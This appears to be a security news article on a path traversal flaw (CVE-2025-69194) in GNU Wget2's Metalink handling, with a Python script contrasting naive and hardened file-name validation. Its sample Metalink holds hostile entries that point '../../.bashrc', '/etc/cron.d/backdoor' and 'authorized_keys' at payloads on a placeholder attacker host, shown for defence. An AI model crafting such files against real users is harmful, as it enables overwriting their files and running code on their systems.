A high-severity security flaw has been discovered in GNU Wget2, a popular command-line tool used for downloading files from the web.
The vulnerability, tracked as CVE-2025-69194, allows a remote attacker who can get a user to process a crafted Metalink document to write files outside the intended download directory, without the user's knowledge or consent.
The issue is rated Important with a CVSS score of 8.8 (High), a significant risk for anyone who relies on Wget2's Metalink support to fetch content.
| Feature | Details |
|---|---|
| CVE ID | CVE-2025-69194 |
| Vulnerability Type | Arbitrary File Write (Path Traversal) |
| Severity | High (Important) |
| CVSS Score | 8.8 / 10 |
How the Attack Works
The vulnerability stems from how Wget2 handles Metalink documents. A Metalink file is an XML description of a download that lists several sources for the same file (such as HTTP or FTP mirrors and peer-to-peer links) together with the file's name and, optionally, its size and checksums.
When Wget2 processes a Metalink file, it should confine every file it writes to the intended download directory, regardless of what the document claims the file is called.
However, security researchers from Apache found that Wget2 does not correctly validate the file names listed in these Metalink documents.
This is a classic path traversal flaw. By crafting a Metalink file whose file names contain traversal sequences (typically ../ components), an attacker can point the output outside the download directory.
If a user downloads and processes such a file, Wget2 writes the attacker's content to a location of the attacker's choosing, with the privileges of the user running Wget2.
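As an added example (not code from Wget2 or from the researchers who reported the flaw), the following Python script parses a small Metalink v4 document and computes the output path for each file entry two ways: the naive join that a path traversal bug amounts to, and a hardened version that normalises the name, rejects absolute paths, drive letters and any .. component, and then confirms that the resolved path still lies inside the download directory. The sample document, its hostnames and every function name here are constructed for illustration and are not Wget2's own. The hardened check rejects any name containing .. even when the result would land back inside the directory, which is stricter than strictly required but much simpler to reason about.

```python
import ntpath
import os
import posixpath
import xml.etree.ElementTree as ET

# Metalink v4 namespace (RFC 5854).
NS = {"m": "urn:ietf:params:xml:ns:metalink"}

# Download directory for this demonstration (assumption: relative to the cwd).
DOWNLOAD_DIR = os.path.join(os.getcwd(), "downloads")

# Constructed sample document: one honest entry with two mirrors, followed by
# three entries whose names try to escape the download directory. Hostnames
# are placeholders under .invalid, not real mirrors.
SAMPLE_METALINK = """<?xml version="1.0" encoding="UTF-8"?>
<metalink xmlns="urn:ietf:params:xml:ns:metalink">
  <file name="tool-1.0.tar.gz">
    <url priority="2">https://mirror2.example.invalid/tool-1.0.tar.gz</url>
    <url priority="1">https://mirror1.example.invalid/tool-1.0.tar.gz</url>
  </file>
  <file name="../../.bashrc">
    <url>https://evil.example.invalid/payload</url>
  </file>
  <file name="/etc/cron.d/backdoor">
    <url>https://evil.example.invalid/cron</url>
  </file>
  <file name="docs/..\\..\\authorized_keys">
    <url>https://evil.example.invalid/keys</url>
  </file>
</metalink>
"""


def naive_output_path(download_dir, name):
    """The unsafe pattern: join the attacker-controlled name as-is.

    os.path.join drops download_dir entirely when name is absolute, and a
    leading ../ walks out of the directory after normalisation.
    """
    return os.path.join(download_dir, name)


def escapes(download_dir, path):
    """True if path resolves to a location outside download_dir."""
    base = os.path.realpath(download_dir)
    return os.path.commonpath([base, os.path.realpath(path)]) != base


def safe_output_path(download_dir, name):
    """Return the path to write to, or None if name must not be honoured."""
    if not name or "\x00" in name:
        return None
    # Metalink names use '/' separators; treat backslashes as separators too,
    # so a Windows-style "..\\" cannot slip past the check on POSIX hosts.
    norm = name.replace("\\", "/")
    # Reject drive letters ("C:...") and anything rooted ("/etc", "//srv/share").
    if ntpath.splitdrive(norm)[0] or posixpath.isabs(norm):
        return None
    parts = [p for p in norm.split("/") if p not in ("", ".")]
    if not parts or any(p == ".." for p in parts):
        return None
    base = os.path.realpath(download_dir)
    candidate = os.path.realpath(os.path.join(base, *parts))
    # Defence in depth: even after the component check, confirm containment.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def plan_downloads(metalink_xml, download_dir):
    """Parse a Metalink v4 document and return (accepted, rejected).

    accepted: list of (output_path, [mirror URLs in priority order])
    rejected: list of <file name="..."> values that failed validation
    """
    root = ET.fromstring(metalink_xml)
    accepted, rejected = [], []
    for entry in root.findall("m:file", NS):
        name = entry.get("name", "")
        target = safe_output_path(download_dir, name)
        if target is None:
            rejected.append(name)
            continue
        urls = sorted(entry.findall("m:url", NS),
                      key=lambda u: int(u.get("priority", "999999")))
        accepted.append((target, [(u.text or "").strip() for u in urls]))
    return accepted, rejected


if __name__ == "__main__":
    accepted, rejected = plan_downloads(SAMPLE_METALINK, DOWNLOAD_DIR)
    for path, urls in accepted:
        print("would fetch", path, "from", urls)
    for name in rejected:
        print("rejected", repr(name), "naive join would give",
              naive_output_path(DOWNLOAD_DIR, name))
```

Run as-is, the script accepts only tool-1.0.tar.gz and reports the three hostile names together with the path the naive join would have produced, which makes the escape visible without writing anything to disk.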
The consequences of an arbitrary file write are serious. Depending on the privileges of the user running Wget2, an attacker could:
- Overwrite critical files: system files or user documents writable by that user could be replaced or corrupted, causing permanent data loss.
- Execute malicious code: by overwriting configuration files or scripts that the system or the user's shell runs automatically, an attacker could gain control of the user's account or system.
- Bypass security: where Wget2 runs with sufficient privileges, an attacker could modify password files or security settings to lock users out or plant a backdoor.
Exploitation requires the victim to process an attacker-supplied Metalink file, but given the impact of an arbitrary file write, Metalink documents from untrusted sources should be treated with the same caution as any other untrusted download.
